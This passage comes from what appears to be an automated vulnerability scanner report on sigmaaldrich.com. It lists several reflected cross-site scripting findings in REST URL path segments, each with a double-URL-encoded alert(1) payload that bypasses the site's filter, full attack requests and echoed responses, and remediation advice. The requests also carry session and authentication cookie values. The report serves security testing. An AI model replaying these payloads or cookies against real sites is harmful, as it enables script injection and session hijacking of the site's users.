Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:38 GMT
Content-Length: 28985
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/technical-service/technical-service-home/enews-subscriptionc8fa8";alert(1)//22e7bdf4d51","E404") ;
   </script>
...[SNIP]...

1.223. http://www.sigmaaldrich.com/content/sigma-aldrich/technical-service/technical-service-home/literature-request [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/technical-service/technical-service-home/literature-request

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27269%2522%253balert%25281%2529%252f%252f1f12ad1242 was submitted in the REST URL parameter 1. This input was echoed as 27269";alert(1)//1f12ad1242 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content27269%2522%253balert%25281%2529%252f%252f1f12ad1242/sigma-aldrich/technical-service/technical-service-home/literature-request HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:26 GMT
Content-Length: 28984
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content27269";alert(1)//1f12ad1242/sigma-aldrich/technical-service/technical-service-home/literature-request","E404") ;
   </script>
...[SNIP]...

1.224. http://www.sigmaaldrich.com/content/sigma-aldrich/technical-service/technical-service-home/literature-request [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/technical-service/technical-service-home/literature-request

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b8c2%2522%253balert%25281%2529%252f%252f883d4082bed was submitted in the REST URL parameter 2. This input was echoed as 4b8c2";alert(1)//883d4082bed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich4b8c2%2522%253balert%25281%2529%252f%252f883d4082bed/technical-service/technical-service-home/literature-request HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:28 GMT
Content-Length: 28985
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich4b8c2";alert(1)//883d4082bed/technical-service/technical-service-home/literature-request","E404") ;
   </script>
...[SNIP]...

1.225. http://www.sigmaaldrich.com/content/sigma-aldrich/technical-service/technical-service-home/literature-request [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/technical-service/technical-service-home/literature-request

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1371d%2522%253balert%25281%2529%252f%252f8f63dedfa0 was submitted in the REST URL parameter 3. This input was echoed as 1371d";alert(1)//8f63dedfa0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/technical-service1371d%2522%253balert%25281%2529%252f%252f8f63dedfa0/technical-service-home/literature-request HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:29 GMT
Content-Length: 28984
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/technical-service1371d";alert(1)//8f63dedfa0/technical-service-home/literature-request","E404") ;
   </script>
...[SNIP]...

1.226. http://www.sigmaaldrich.com/content/sigma-aldrich/technical-service/technical-service-home/literature-request [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/technical-service/technical-service-home/literature-request

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12cd0%2522%253balert%25281%2529%252f%252f90fb9daca14 was submitted in the REST URL parameter 4. This input was echoed as 12cd0";alert(1)//90fb9daca14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/technical-service/technical-service-home12cd0%2522%253balert%25281%2529%252f%252f90fb9daca14/literature-request HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:31 GMT
Content-Length: 28985
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/technical-service/technical-service-home12cd0";alert(1)//90fb9daca14/literature-request","E404") ;
   </script>
...[SNIP]...

1.227. http://www.sigmaaldrich.com/content/sigma-aldrich/technical-service/technical-service-home/literature-request [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/technical-service/technical-service-home/literature-request

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a171f%2522%253balert%25281%2529%252f%252fb6d51f297e was submitted in the REST URL parameter 5. This input was echoed as a171f";alert(1)//b6d51f297e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/technical-service/technical-service-home/literature-requesta171f%2522%253balert%25281%2529%252f%252fb6d51f297e HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
